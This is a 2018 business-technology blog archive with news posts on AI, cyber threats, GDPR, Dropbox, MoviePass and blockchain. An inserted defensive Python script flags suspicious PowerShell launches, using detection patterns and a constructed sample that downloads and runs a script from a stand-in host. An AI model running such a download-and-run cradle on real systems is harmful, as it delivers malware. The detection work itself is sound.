Monday, March 19, 2018

Voice Recognition 'Sexist'

Delip Rao, CEO and co-founder of start-up R7 Speech Sciences, has brought back into the spotlight the issue that voice recognition systems struggle more with female voices.

Not New

The issue has been known about for some time and has been brought into sharper focus with the popularity of voice-activated digital assistants like Apple’s Siri, or Amazon’s Alexa, or Google Home.


According to Linguistics experts, the key problem is that females have higher pitched voices than males, and they tend to be quieter and sound more “breathy” when they talk.

In speech, for example, Mean Fundamental Frequency (Mean F0) can be expressed as a number around which vocal tones are spread. The F0 for men is around 120Hz, but for women it is much higher at 200Hz.


Another problem for voice recognition systems comes when they try to process words and sounds into MFCCs (Mel-frequency cepstral coefficients). The voices of women are known to give a less robust acoustic signal, and this signal can be easily masked by noise. These two challenges make things more difficult for speech recognition systems.

Lack of Diverse Training

Since speech recognition systems rely on an AI element, they require training to become more used to recognising certain vocal characteristics. Linguistics experts, therefore, believe that a lack of diverse training examples of the speech of women may be a contributing factor to the problems encountered by current voice recognition systems.

Gender Biases As A Result

Some commentators are, therefore, predicting a possible worsening of gender bias problems with voice recognition systems if these issues are not tackled.

Experts have pointed out the importance of training systems using equal proportions of men and women to avoid the problem of them being very good at recognising male data and very bad at recognising female data.

Ethnic Mix

The same experts have also highlighted potential biases based on ethnicity if voice recognition systems aren’t trained using a wide ethnic as well as gender mix.

What Does This Mean For Your Businesses?

With digital assistants now in the workplace in computer systems (e.g. Alexa for Business), and with AI bots being used e.g. to handle customer service systems (with a voice element), it’s important that women and / or certain ethnic groups are not at a disadvantage when using the systems.

The problem is known about now, and companies should, therefore, be taking action to make sure that voice recognition systems work well for all demographics, and deliver equality as part of their value.

Accountants To Use AI For The 'Boring' Stuff

A study by Sage that identified how 83% of clients would like their accountants to extend their services has seen 50% of accountants looking to solutions like AI to allow them to free up the necessary time to do so.

Off-Load Repetitive Tasks To AI

With accountancy clients looking for consultancy and advice (42%) as well as traditional services, half of the 3,000 accountants involved in the Sage study appear to be happy to consider AI and automation technology solutions to handle the workload of repetitive tasks such as number crunching, data entry and diary management.

Likely To Invest

The president of AI at Sage, Kriti Sharma, has been reported as having recognised that although AI is currently viewed as an automation tool by accountants, more are likely to invest in AI in the coming years as an important, lower cost way to scale their operations.

For example, AI could be used to review millions of transactions and spot anomalies, and even make recommendations. This would normally be something that would be done manually. AI could, therefore, significantly decrease costs and make accountants more time-rich, thereby enabling them to develop and sell new services.

Many Industries Adopting AI

Accountancy is certainly not the only industry beginning to realise and unlock the potential of AI. For example:
  • Some legal firms are already using AI to assemble, process and read certain types of documents.
  • AI ‘cognitive technology’ is being used to answer customer questions in many areas of services.
  • In banking e.g. Nat West, AI software is being used to offer consumers an investment advice service. Also, for Royal Bank of Scotland (RBS) automated financial advice services have allowed the bank to reduce face-to-face adviser jobs by 220. As far back as 2016, RBS and NatWest introduced their virtual customer service technology in the form of the ‘Luvo’ chatbot from IBM Watson.
  • The AI chatbot called 'DoNotPay' (originally launched in March 2016 by British student, Joshua Browder), made famous for providing legal advice that led to a reported 375,000 claims against parking tickets, was then modified so that it could automatically sue Equifax for $15,000 per claim in the wake of a hack and data breach.

What Does This Mean For Your Business?

The adaptability and capacity of AI to learn and tackle even complicated tasks (in April last year an AI program beat the world’s leading poker players in a 5-day competition), means that it has huge business potential. Deploying AI e.g. to tackle repetitive tasks and free-up time in accountancy is just another example of how this technology can be used to add value, save costs, help meet changing customer needs, allow the cost-effective scaling of businesses, and improve competitiveness.

Even though AI appears to be advancing at a fast rate, we really haven’t seen anything yet as regards its true potential.

Eight New Cyber Threats Every Second

The latest McAfee Labs threat report shows that in the last quarter of 2017, organisations faced 8 new cyber threats a second as there was an 18% increase in the number of reported security incidents across Europe.

478 New Cyber Threats Every Minute

The report makes worrying reading as businesses and organisations try to secure their online and data security systems in preparation for the introduction of GDPR.

The McAfee Labs report shows an 18% increase in the number of reported security incidents across Europe, with a specific focus on the adoption of newer tools and schemes, such as fileless malware, cryptocurrency mining and steganography.

Cryptocurrency Mining

The rocketing value of the cryptocurrency Bitcoin led to a big increase in cryptocurrency mining / cryptojacking in the last quarter of 2017. Cryptojacking involves installing 'mining script' code such as Coinhive into multiple web pages without the knowledge of the website owners. The scammer then gets multiple computers to join their networks so that the combined computing power will enable them to solve mathematical problems. Whichever scammer is first to solve these problems is then able to claim / generate cash in the form of cryptocurrency.

Also, at the end of 2017, ransomware operators were found to be hijacking Bitcoin and Monero wallets using Android apps developed exclusively for the purpose of cryptocurrency mining. Many criminals appear to have favoured Litecoin over Bitcoin because there was a lesser chance of exposure.

Fileless Malware Attacks

Another trend uncovered by the McAfee Labs threat report was the adoption of fileless malware and abusing Microsoft PowerShell, which showed a 432% surge over the course of 2017.

Fileless malware involves hijacking tools that are already built-in to Windows rather than installing software on a victim’s computer. It is designed to work in-memory (in the computer’s RAM) and is, therefore, very resistant to existing anti-computer forensic strategies, and is difficult to detect.

The McAfee report showed a huge 267% growth in the use of the new PowerShell malware. PowerShell is a legitimate tool (scripting language) that is built-in to Windows, and provides access to a machine’s inner core, including Windows APIs. This is why it has become a favoured route for fileless malware attacks.

Increase In Attacks On Healthcare

One other disappointing trend uncovered in the McAfee Labs threat report is the dramatic 210% overall increase in incidents against healthcare organisations in 2017. It is believed that these attacks were facilitated by organisational failures to comply with security best practices, or to address many known vulnerabilities in medical software.

What Does This Mean For Your Business?

The report highlights how businesses now face risks on an unprecedented scale, and how, particularly with GDPR on the way, businesses need to prioritise cyber and data security. A collaborative and liberalised information-sharing approach should be taken to improve attack defences and combat escalating asymmetrical cyber warfare.

Cyber-criminals always try to combine the highest returns in the shortest time with the least risk. This is why tactics like cryptojacking, stealthy fileless PowerShell attacks, and attacks on soft targets such as hospitals have become so popular over the last year.

New threats for this year, such as cyber-criminals developing botnets exploiting the Internet of Things (IoT), will pose more challenges to businesses and the security industry.

New Threat From Fileless PowerShell Exploits

Businesses now face the growing threat of fileless hacking and fileless malware attacks facilitated by the PowerShell scripting language that is already built-in to Windows.

Surge Reported

The latest McAfee Labs threat report shows what an emerging and dangerous threat the exploiting of the PowerShell scripting language has become. Taking the last quarter of 2017, the adoption of fileless malware via Microsoft PowerShell showed a 432% surge.

How Does It Work?

Microsoft PowerShell is a scripting language that’s built-in to the Windows OS. Its main legitimate uses include running background commands, checking services installed on the system, terminating processes, and managing the configurations of systems and servers.

The Microsoft PowerShell scripting language provides access to your computer’s inner core, including unrestricted access to Windows APIs. Also, because it is a legitimate part of your computer’s Operating System, any commands it executes are usually ignored by security software, and it provides no signature for antivirus software to detect. Another crucial aspect of PowerShell is that it can run remotely through WinRM. For these reasons, it has become an ideal route for cyber-criminals.

Controlling Computers Using PowerShell

A hack via PowerShell involves attackers getting to PowerShell remotely through WinRM, enabling them to get through Windows Firewall and run more PowerShell scripts with admin control. Even if WinRM is turned off, it can be turned on remotely through WMI using a single line of code.

Also, through PowerShell, once an attacker obtains a username and password for one computer, the path to complete compromise of the whole enterprise system is laid open.

Recent Fileless Malware Attacks

It has been reported that PowerShell malware arrives via spam email, and it is the embedded code in the email that contains the PowerShell commands. This code usually contains instructions to download another payload to carry out the primary malicious activity.

The McAfee Threat report shows how recent attacks have used PowerShell to download malware of the Bartallex (.bat and .vbs files) and Dridex families onto the systems of victims in what are now popularly known as fileless malware attacks.
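Because the attack described above runs through a legitimate binary, defenders usually look at how PowerShell was launched rather than for a file signature. The following is an added example, not code from McAfee or from this page: it triages process command lines for the launch options and download-and-run content the article describes, decoding any encoded command first. The command lines are constructed samples, and the indicator labels and verdict thresholds are assumptions.

```python
import base64
import re
from typing import List, Optional, Tuple

# Script content that turns a quiet launch into a download-and-run chain.
CONTENT_RULES = {
    "download": re.compile(
        r"(?i)\b(?:DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest)\b"),
    "dynamic-eval": re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"),
}


def is_abbrev(name: str, full: str, min_len: int) -> bool:
    """PowerShell accepts any unambiguous prefix of a parameter name."""
    return len(name) >= min_len and full.startswith(name)


def decode_encoded_command(value: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyse(cmdline: str) -> List[str]:
    """Return the indicator labels found in one process command line."""
    tokens = cmdline.split()
    start = next((i for i, t in enumerate(tokens)
                  if "powershell" in t.lower() or "pwsh" in t.lower()), None)
    if start is None:
        return []
    findings: List[str] = []
    scan_text = cmdline
    args = tokens[start + 1:]
    for i, tok in enumerate(args):
        if tok[0] not in "-/":
            continue
        name = tok[1:].lower()
        value = args[i + 1] if i + 1 < len(args) else ""
        if is_abbrev(name, "command", 1) or is_abbrev(name, "file", 1):
            break  # everything after this is script text or a script path
        if is_abbrev(name, "encodedcommand", 1) or name == "ec":
            findings.append("encoded-command")
            decoded = decode_encoded_command(value)
            if decoded is None:
                findings.append("undecodable-payload")
            else:
                scan_text += "\n" + decoded  # inspect what will really run
        elif is_abbrev(name, "windowstyle", 1) and value.lower() == "hidden":
            findings.append("hidden-window")
        elif is_abbrev(name, "noprofile", 3):
            findings.append("no-profile")
        elif ((is_abbrev(name, "executionpolicy", 2) or name == "ep")
              and value.lower() in ("bypass", "unrestricted")):
            findings.append("policy-bypass")
    findings += [label for label, rx in CONTENT_RULES.items()
                 if rx.search(scan_text)]
    return findings


def verdict(findings: List[str]) -> str:
    """Assumed thresholds: a download combined with concealment is an alert."""
    found = set(findings)
    if "download" in found and found & {"encoded-command", "hidden-window",
                                        "dynamic-eval"}:
        return "alert"
    if found & {"encoded-command", "hidden-window", "policy-bypass"}:
        return "review"
    return "ok"


def triage(cmdline: str) -> Tuple[str, List[str]]:
    findings = analyse(cmdline)
    return verdict(findings), findings


# Constructed samples; example.invalid is a reserved, non-resolving name.
CONSTRUCTED_SCRIPT = ("IEX (New-Object Net.WebClient)"
                      ".DownloadString('http://example.invalid/stage')")
CONSTRUCTED_B64 = base64.b64encode(
    CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLES = [
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup-Logs.ps1",
    "cmd.exe /c powershell -nop -w hidden -enc " + CONSTRUCTED_B64,
    "powershell.exe -Command Get-Service | Where-Object Status -eq Running",
    "powershell -e AAAA",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

The routine administrative launches come back as "ok", while the hidden, encoded launch is only recognised as a download chain once its payload has been decoded, which is why plain string matching on the raw command line misses it.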

What Does This Mean For Your Business?

The combination of PowerShell providing legitimate access to computers and its subsequent ability to be ignored by security software, as well as the ability to run it remotely through WinRM, make it a low risk, low cost and potentially high return tactic for cyber-criminals. This means that fileless hacks and fileless malware attacks are now a serious and present risk to businesses and organisations of all kinds.

The stealth factor, plus the fact that it goes under the radar of normal antivirus software makes detection very difficult. The one clear chance to stop it appears to be not opening the malicious email that contains the code that begins the attack. Companies and organisations need to make sure that all staff are trained to recognise and resist social engineering tactics, and to be made aware of the risk of downloading and installing applications that they do not understand or trust.

UK Economy Could See £26bn From Rural Digital Investment

A study has revealed that greater investment in digital technologies and connectivity in rural parts of the UK could add between £12bn and £26.4bn annually to the British economy.

Digital Strategy and Investment Needed

The study, which was commissioned by Amazon and conducted by think tanks Rural England and Scotland’s Rural College (SRUC), showed that the rural economy is already worth £299bn in gross value add (GVA) to the national economy.

The report argues that a government-led digital rural strategy coupled with investment could unlock the potential of businesses in rural areas, and could increase business turnover by £15bn.

Concerns & Challenges

The report found that business owners in rural communities have many of the same concerns as larger businesses in more built-up areas. For example, four in five rural business owners saw digital tools and services as being important to their growth potential, and better access to cloud computing as being the biggest driver for their future growth.

Other perceived growth catalysts in the report were 5G mobile networks (54%), the IoT (47%), and machine learning and artificial intelligence (AI) (26%). Export businesses in the retail, tourism, and hospitality industries also identified e-commerce tools as being potential growth drivers.

The main perceived challenges to growth in rural businesses were identified in the report as being access to broadband and other forms of connectivity, and skills shortages (52%) e.g. recruiting people with appropriate skills, or retraining existing workers.


Amazon, who commissioned the report, has offered its own recommendations for public and private sector businesses, based on the results. These include:
  • The establishment of Digital Enterprise Hubs in rural towns to help (small) businesses with connectivity, workspace and training, and collaboration between employees and education / training or re-training providers.
  • The setting up of a single information portal to streamline digital support services.
  • The setting up of a single information portal and local directories to give guidance to businesses on digital resources.
  • Encouraging local, rural businesses that are already lucky enough to have and use superfast broadband services to encourage their peers to do the same.
  • Prioritising investment in connectivity and digital tools for rural businesses.
  • Making support for digital growth a key objective in future rural business support programmes.
  • The government encouraging large technology-driven firms to implement policies focused on digital adoption in rural areas that provide support for smaller businesses.

What Does This Mean For Your Business?

If you run a business in a rural area, you are likely to recognise the challenges outlined in the report and to welcome many of the ‘quick win’ recommendations that Amazon has made, plus the fact that this report has put rural digital business challenges back in the media spotlight.

Given a high priority, and the right level of government support and investment, there is no doubt that early-adopter rural businesses could be big contributors to the UK economy, and could compete with global competitors.

Many commentators, however, see this vision as still being some way off, partly because of the time that it will take to get high-speed broadband connectivity to all rural areas, let alone towns in the UK. For example, despite full fibre broadband pilots already being operated as part of the UK’s National Productivity Investment Fund, the reality is that the UK may still only actually have 7% full fibre coverage by 2020.

Tuesday, March 13, 2018

Facebook Ads That Target Your Beliefs

In a new trial involving a small number of users in the UK, Facebook has said that it will be testing the targeting of adverts based on users’ specific political and religious beliefs.


According to Facebook, the trial will help the social media platform to process and manage its customer data, so that it will be in a better position to ensure compliance with GDPR when it comes into force in May this year.

The severity of the fines associated with the enforcement of GDPR for large companies such as Facebook e.g. a fine for a breach of up to €20 million or 4% of their global annual turnover, whichever is greater, is likely to be a big motivator behind a trial that could improve how Facebook processes and stores data.

How Could Targeting Adverts This Way Be Of Help?

The trial appears to be using adverts for consenting participants to focus on testing and improving how the company handles the required greater consent from data subjects that GDPR will bring, and to ensure that sensitive data is better protected.

One other important result of the trial will be to enable the testing of facial recognition. Facebook is exploring how it can successfully give users an opt-in for facial recognition, which will form part of a measure to stop online impersonations by informing users whenever their faces have been used elsewhere on the site.

The Trial

It has been reported that the trial will work by first asking a number of UK users for permission to allow advertisers to target them on the basis of their political and religious beliefs, and their listed interests.

It is understood that Facebook will also ask users whether they are happy for their public information that identifies them (e.g. their faith and politics) to remain visible for everyone and, if permission is given, Facebook will provide an opt-in for allowing the information to be used to personalise content, and also act as one of the signals for suggesting relevant ads. This will include targeted advertising based upon things like politics, sexuality and faith.


Some people have expressed fear that opting-in to elements of the trial could enable extremists to use targeted advertising for recruitment propaganda. Facebook has denied this.

What Does This Mean For Your Business?

This story is more proof that the seriousness of the implications of GDPR is hitting home, particularly with those companies that stand to lose in a big way if they are found not to be compliant. Although the subject of targeted advertising is an emotive one that can make us feel a bit uneasy as Internet users in terms of privacy, it is at least good news that this Facebook trial could lead to better protection of our personal data by a platform that arguably knows more about us than most.

With X-day now past, this story should be another reminder that it’s time for companies everywhere to think about double-checking that their own systems and procedures will be GDPR compliant.

One Hour To Take Down Illegal Content

New measures by the EU will mean that technology companies will have as little as just one hour to take down illegal and terror content, or face penalties under new legislation.

Why Only One Hour?

The new measure, which has reportedly been met with dismay by the big tech companies such as Google and Facebook (who will arguably be most seriously affected), is focused mainly on terror-related content. The logic is that because terrorist content is considered to be most harmful in the first hours of its appearance online, all companies will be required to remove such content within only one hour from its referral, as a general rule.

Other illegal content that is being targeted by the new measures includes incitement to hatred and violence, child sexual abuse material, counterfeit products and copyright infringement content.

3 Months To Report Back

As well as the news that tech companies must remove the most serious content within one hour, the EC has also announced that any tech company that is responsible for people posting content online will have only three months from now to report back to the EU on what they were doing to meet the new targets it has set.

Operational Measures

The EC recommendations are that a set of operational measures will be used to ensure faster detection and removal of illegal content online, to reinforce the cooperation between companies, trusted flaggers and law enforcement authorities, and to increase transparency and safeguards for citizens. These operational measures will be:
  • Clearer 'notice and action' procedures. Companies should set out easy and transparent rules for notifying illegal content. These should include fast-track procedures for 'trusted flaggers'. Also, to avoid unintended removal of content which is not illegal, content providers should be informed about such decisions and have the opportunity to contest them.
  • More efficient tools and proactive technologies. This means that companies should set out clear notification systems for users. These should include proactive tools to detect and remove illegal content, in particular for terrorism-related content and for content which does not need contextualisation to be deemed illegal, such as child sexual abuse material or counterfeited goods.
  • Stronger safeguards to ensure rights. To ensure that decisions to remove content are accurate and well-founded, companies should put in place effective and appropriate safeguards. These should include human oversight and verification, in full respect of fundamental rights, freedom of expression and data protection rules.
  • Special attention to small companies. The technology industry should, through voluntary arrangements, cooperate and share experiences, best practices and technological solutions, and this shared responsibility should particularly benefit smaller platforms with more limited resources and expertise.
  • Closer cooperation with authorities. If there is evidence of a serious criminal offence or a suspicion that illegal content is posing a threat to life or safety, companies will be required to promptly inform law enforcement authorities, and EC Member States should establish the appropriate legal obligations.

The recommendations are in addition to on-going work with the technology industry through voluntary initiatives to ensure that the internet is free of illegal content, and are intended to reinforce actions taken under different initiatives.

Response From The Tech Industry

Although Facebook has said that it shares the European Commission's goal, the industry association EDiMA (which includes Facebook, Google, and Twitter) has stressed that the one-hour turn-around time could harm the effectiveness of service providers' take-down systems rather than help.

What Does This Mean For Your Business?

As the Vice-President for the Digital Single Market Andrus Ansip has pointed out, online platforms have become many people's main gateway to information. For this reason, and if we accept that what is illegal offline is also illegal online, many people feel that these widely used technology platforms now have a responsibility to provide a secure environment for their users. Many businesses are advertisers on these platforms, and are likely to share a desire to rid them of illegal content.

While some popular tech platforms have continued to resist what some see as too much censorship, interference, or over-regulation, the frequency and severity of terrorist attacks in Europe and the role and influence of platforms in spreading information, true or false (e.g. the US election) has given governments the fuel, impetus, and feeling of justification to try and apply more force to tech companies. The EC’s view is that the spread of illegal content online undermines the trust of citizens in the Internet and poses security threats, and the new operational measures could, along with any self-regulation, speed up the process of clearing illegal content.

The scale and frequency of illegal content posting has posed serious cost and resources challenges to tech platforms in recent years.

Dropbox Integrates With Google Cloud and G-Suite

Dropbox has announced that it is now one step closer to delivering a unified home for work by forming a new partnership with Google Cloud that will integrate G-Suite in its cloud storage.

What Was The Problem?

Dropbox had been looking for ways to help customers make projects easier to manage, centralise their frequently used files and information, and reduce the time wasted in having to swap between files and bits of work scattered across storage buckets, apps, and devices. The company is also looking for new ways to compete in a crowded cloud storage market.

The new integration that the partnership will deliver to all Dropbox users will mean that they can use Dropbox to create, open, and edit Google Docs, Sheets, and Slides files live. It will also mean that Business Administrators will be able to manage Google Docs, Sheets, and Slides files like any other content that resides in Dropbox.

With G Suite made accessible, no matter what tools users bring to work, Dropbox and Google customers will be able to better collaborate with their frequently used tools.

Additional Native G Suite Integrations

As well as being able to use Google Docs and files in Dropbox, users will also be able to benefit from additional native G Suite integrations e.g. with Gmail and Hangouts Chat. This could help teams to stay connected with project content and the conversations around it. The Gmail add-on will allow users to display the dates of creation, modification, and last-accessed for linked files, and the Hangouts integration will bring previews for linked files directly to chats.

When Is It Available?

The new Dropbox, Google Cloud and G-Suite integration will be made available to Dropbox customers in the second half of 2018.

One of Many Collaborations For Dropbox

This is one of many collaborations with leading brands for Dropbox in recent times. For example, Dropbox has formed partnerships with Adobe Creative Cloud and its Adobe XD, Microsoft, Apple, and Workplace by Facebook.

Answer To Competition

The latest partnership with Google is another way that Dropbox can fight back against some fierce competition from the likes of Microsoft. For example, Microsoft is reported to have been trying to lure users of cloud services from Box, Dropbox and Alphabet's Google Drive by giving them its competitive product ‘OneDrive for Business’ for free until their current contract expires. Microsoft will be running the promotional switching offer for the next five months.

What Does This Mean For Your Business?

For businesses that collaborate online and need to centralise stored documents, this latest partnership is likely to be good news. The promise of centralised content, secure collaboration, and more effective communication through platforms that are already in popular use for many businesses could bring cost and time savings, reduce wastage and frustration, and could improve competitiveness by simplifying things.

All the collaborations between Dropbox and other leading brands could be particularly beneficial to small businesses that will be able to more easily access files, documents and other types of data they need on a daily basis.

Also, this good news about Dropbox can only be helpful in making some headway in restoring trust and helping customers to forget about the bad news from last September, when it was revealed that the usernames, email addresses and encrypted passwords of an astonishing 68 million customers, stolen in a hack back in 2012, had re-surfaced in a leak.

Location Based Marketing ... Tracking You At The Flicks

MoviePass CEO, Mitch Lowe, has caused controversy by telling the Hollywood audience at the Entertainment Finance Forum that his MoviePass app can track and gather information about users before and after their trip to the movies.

What Is MoviePass?

MoviePass, based in New York, offers a service whereby, for a flat monthly fee ($9.95 per month), users can go and watch an unlimited number of movies in cinemas, with some restrictions. It could be described as a kind of Netflix for moviegoers.

Location Tracking

According to the MoviePass CEO, the company’s app has location-tracking built-in. What some commentators have described as ‘creepy’ though is that the app can track your movements long before and after you’ve been to watch a movie.


What MoviePass prefers to call ‘location-based marketing’ is reportedly being used to improve the customer’s experience of the service and create more opportunities for subscribers to enjoy all the various elements of what the company thinks make up a good movie night. The company says that by tracking customers and gathering data along the way, it can “create a full-featured movie-going experience”.


The big idea is that subscribers may want refreshments before or after the movie, and may have to travel some distance to the cinema. By knowing a subscriber’s location and route, MoviePass can then, via the phone app, give the subscriber details like discounts on transportation, finding places to park nearby, coupons for nearby restaurants, and other similar opportunities.

What Kind Of Data Is Gathered?

According to online reporting of CEO Lowe’s speech, as well as your location, the MoviePass app is also capable of gathering “an enormous amount of information,” which includes your address, which Mr Lowe says can be used for demographic information.


What MoviePass may see as a kind of personalised, helpful marketing idea, critics appear to see as a potentially dangerous invasion of privacy that could have security consequences for MoviePass subscribers.

What Does This Mean For Your Business?

Using new technology to improve marketing and customer experiences is all very well, but the point here is that customers need to be informed exactly what happens to their data, what is collected by the app, how it’s stored and for how long. This will enable them to make an informed choice, give consent, or decline. In a time when cyber-crime and data mismanagement and theft appear to be rife, customers value their privacy and data security more than ever. Companies need to be transparent about their intentions and methods, and need to be able to show customers that they can be trusted with their valuable personal data.

Also, in this case, the capabilities of the app appeared to come as a shock, and to some commentators, this may have appeared to be an inappropriate way and style to reveal what the app is capable of. This is likely to prompt complaints from some customers, and could harm the reputation of MoviePass.

If you are worried about the security implications of apps of this kind, for example, you could try to limit location data collection by going into your phone’s app settings. One other, obvious way to avoid any problems with the app would be to avoid MoviePass for now.

The introduction of GDPR in May this year is also likely to have implications for how MoviePass deals with the data of any EU citizen subscribers, as the company will need to comply with the new Regulation.

Blockchain Used To Reduce Child Labour

Blockchain, the same technology that powers the Bitcoin cryptocurrency, is being tested in a pilot project between car-maker BMW and start-up Circulor with a view to eliminating battery minerals produced using child labour.

What Is Blockchain?

Blockchain is an incorruptible peer-to-peer network (a kind of ledger) that allows multiple parties to transfer value in a secure and transparent way. Blockchain’s Co-Founder Nic Cary describes Blockchain as being like “a big spreadsheet in the cloud that anyone can use, but no one can erase or modify”.

Battery Mineral Problem

The pilot between BMW and Circulor is focusing on reducing child labour by finding a way to avoid using any cobalt that is mined in unregulated artisanal mines in the Democratic Republic of Congo. At the moment one fifth of cobalt is mined in a way that often uses child labour.

How Can Blockchain Help?

The pilot project is using Blockchain to help provide a way to prove that artisanal miners are not using child labour in their cobalt mining activities.

Each bag of cobalt produced by an artisanal miner will be given a digital tag. This tag will be entered into Blockchain using a mobile phone. The details of the digital tag will then be entered by each link in the chain of buyers, thereby providing a clear, verifiable trail, all the way from miner to smelter. Since Blockchain is ‘incorruptible’, provided all organizations throughout the supply chain are involved in the project, the Blockchain evidence should be accurate.
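The tag-and-handover trail described above can be sketched as a hash-linked ledger. This is an added example, not code from BMW, Circulor or the pilot project: the class and function names, bag tags and party names are constructed for illustration, and a single in-memory list stands in for a ledger that would really be replicated across the supply-chain parties.

```python
import copy
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first block


def digest(body):
    """SHA-256 over a canonical JSON encoding of a block's fields."""
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


class CustodyLedger:
    """Append-only list of hash-linked custody records (hypothetical model)."""

    def __init__(self):
        self.blocks = []

    def append(self, tag, sender, receiver):
        """Record a handover; sender=None means a miner registers a new tag."""
        prev = self.blocks[-1]["hash"] if self.blocks else GENESIS
        body = {"index": len(self.blocks), "tag": tag,
                "from": sender, "to": receiver, "prev": prev}
        self.blocks.append({**body, "hash": digest(body)})


def verify(blocks):
    """Return a list of problems; an empty list means the trail is consistent."""
    problems = []
    prev = GENESIS
    holder = {}  # tag -> party currently recorded as holding that bag
    for i, block in enumerate(blocks):
        body = {k: v for k, v in block.items() if k != "hash"}
        # 1. The stored hash must match the block's own contents.
        if digest(body) != block["hash"]:
            problems.append(f"block {i}: contents do not match stored hash")
        # 2. Each block must point at the hash of the block before it.
        if block["prev"] != prev:
            problems.append(f"block {i}: broken link to previous block")
        prev = block["hash"]
        # 3. Only the recorded holder of a tag may pass it on.
        tag, sender = block["tag"], block["from"]
        if sender is None:
            if tag in holder:
                problems.append(f"block {i}: tag {tag} registered twice")
        elif holder.get(tag) != sender:
            problems.append(f"block {i}: {sender} does not hold tag {tag}")
        holder[tag] = block["to"]
    return problems


def trail(blocks, tag):
    """Parties that have held a tagged bag, in order, from miner to smelter."""
    return [b["to"] for b in blocks if b["tag"] == tag]


def tamper(blocks, index, field, value, rehash=False):
    """Return a copy with one field edited after the fact.

    With rehash=True the editor also recomputes that block's hash, which
    moves the inconsistency to the link held by the following block.
    """
    forged = copy.deepcopy(blocks)
    forged[index][field] = value
    if rehash:
        body = {k: v for k, v in forged[index].items() if k != "hash"}
        forged[index]["hash"] = digest(body)
    return forged


def build_sample():
    """Constructed sample: two bags, one traced from miner to smelter."""
    ledger = CustodyLedger()
    ledger.append("BAG-0001", None, "miner-A")
    ledger.append("BAG-0001", "miner-A", "trader-B")
    ledger.append("BAG-0002", None, "miner-C")
    ledger.append("BAG-0001", "trader-B", "smelter-D")
    return ledger


if __name__ == "__main__":
    sample = build_sample().blocks
    print("trail:", trail(sample, "BAG-0001"))
    print("untouched:", verify(sample))
    print("edited:", verify(tamper(sample, 1, "to", "trader-X")))
    print("edited and rehashed:",
          verify(tamper(sample, 1, "to", "trader-X", rehash=True)))
```

Verification covers the records only: it shows that nobody rewrote the trail after the fact, not what was physically in a bag when it was tagged.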


Challenges to the system being tested in the pilot could include cobalt mined by a child simply being mixed in with ‘clean’ cobalt prior to processing.

Used In Similar Industries

There is every reason to think that Blockchain could help with ethical cobalt mining and supply because it has been used in a similar way by the diamond industry to provide a forgery-proof record of a diamond’s lifecycle.

What Does This Mean For Your Business?

The Blockchain technology has always shown huge promise, beyond simply being used in digital currencies. One of its key strengths is that trust is embedded into the incorruptible system. This means that businesses can use it to categorically prove a certain source and route for e.g. delivery, raw materials or production. This could be particularly valuable to businesses where provenance of some kind is necessary to add to the monetary, ethical or other value of a product or service.
After first being used in the financial, legal and public sectors, Blockchain is now being used by businesses and organisations around the world in many other different ways such as:
  • Using the data on a Blockchain ledger to record the temperature of sensitive medicines being transported from manufacturers to hospitals in hot climates. The ‘incorruptible’ aspect of the Blockchain data gives a clear record of care and responsibility along the whole supply chain.
  • Using an IBM-based Blockchain ledger to record data about wine certification, ownership and storage history. This has helped to combat fraud in the industry and has provided provenance and re-assurance to buyers.
  • Shipping Company Maersk using a Blockchain-based system for tracking consignments that addresses visibility and efficiency i.e. digitising a formerly paper-based process that involved multiple interactions.
  • Start-up company ‘Electron’ building a Blockchain-based system for sharing information between those involved in supplying energy which could speed up and simplify the supplier switching process. It may also be used for smart grid processes, such as local load-balancing of supply and demand.
  • Australian start-up Zimrii developing a Blockchain-based service that allows independent musicians to sell downloads to fans, distribute the proceeds between collaborators, and allow interaction with managers.
Blockchain still has huge untapped potential for all kinds of businesses and could represent a major opportunity to improve services, and effectively tackle visibility, transparency and efficiency issues.

Sunday, March 04, 2018

Fight For DPOs With Introduction of GDPR

Technology and employment commentators are predicting that with the already high demand for skilled and talented Data Protection Officers (DPOs), the introduction of GDPR may see businesses having to compete to recruit the right one.

What’s A Data Protection Officer?

A DPO’s role is essentially that of looking after any legal and ethical issues related to handling customer data. They are required to have specialist knowledge in matters relating to data and information privacy and security.

What Is Demand For DPOs Like Now?

According to figures from the Indeed job search site, DPO job listings posted in the UK have increased by no less than 700% over the past 18 months. That’s the equivalent of an increase from 12.7 listings per 1 million in April 2016 to 102.7 listings per 1 million in December.

Triggered An Increase In Training

The huge increase in the demand for DPOs has led to a corresponding increase in the demand for GDPR training, as individuals spot a potentially lucrative career, and companies seek to bring their in-house DPOs up to speed.

Some GDPR training providers have reported selling out of courses for the next six months as demand for GDPR-Ready training programs for DPOs has increased by as much as one-third.

Even Bigger Demand With Introduction of GDPR

The International Association of Privacy Professionals (IAPP) estimates that, with the introduction of GDPR in May this year, 28,000 DPOs will be needed in Europe and U.S. and perhaps as many as 75,000 around the globe.


GDPR requires that companies must have a DPO to help with tasks such as data audits for compliance with privacy laws, training employees on data privacy, and to be the main point of contact in the company for European regulators.

With its 99 articles, under the guidance of 6 privacy principles, the General Data Protection Regulation (GDPR) is long and complicated, and it requires someone within the business to understand it and how it should be practically applied. Failure to comply with GDPR, and data breaches resulting from non-compliance, can bring large fines and other potentially disastrous consequences for businesses and organisations e.g. loss of customers, and damage to brand and reputation.

Legal and business commentators are also predicting that companies may only want to deal with suppliers who are GDPR compliant in order to maximise their own compliance and avoid the penalties.

What Does This Mean For Your Business?

For those who are already, or are currently training to be DPOs, the immediate future looks bright in terms of their choice of employment, the massive (and growing) demand for their services, and the bargaining power that this may give them with employers e.g. for their salary.

For businesses that are already trying to get to grips with the complications and costs of complying with GDPR, and who already know that they will need somebody in the DPO’s role, they may not have anticipated the extra complication of having to compete with other businesses to get one. With the demand for good DPOs looking like continuing to out-strip supply, the situation may arise where some businesses attempt to poach DPOs from others.

With X-day already past, and the introduction of GDPR just 3 months away, the clock is now ticking loudly for businesses that may not yet have given any serious thought to the role of DPO, or where to get GDPR training.

